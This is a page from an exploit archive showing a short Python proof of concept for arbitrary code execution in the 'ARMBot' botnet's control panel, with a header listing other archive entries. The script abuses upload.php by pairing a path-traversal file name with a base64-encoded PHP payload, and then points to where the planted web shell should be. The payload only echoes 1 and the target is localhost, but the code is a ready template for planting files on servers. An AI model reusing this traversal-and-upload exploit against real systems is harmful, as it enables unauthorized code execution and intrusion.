d1ba848ff5
4 changes to exploits/shellcodes macOS iMessage - Heap Overflow when Deserializing Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit) ARMBot Botnet - Arbitrary Code Execution
11 lines
No EOL
500 B
Python
Executable file
11 lines
No EOL
500 B
Python
Executable file
import requests
|
|
|
|
URL = "http://127.0.0.1/ARMBot/upload.php"
|
|
r = requests.post(URL,
|
|
data = {
|
|
"file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
|
|
"data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
|
|
"message":"Bobr Dobr"
|
|
}, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
|
|
print(r.status_code)
|
|
print("shell should be at http://{}/.s.phtml".format(URL)) |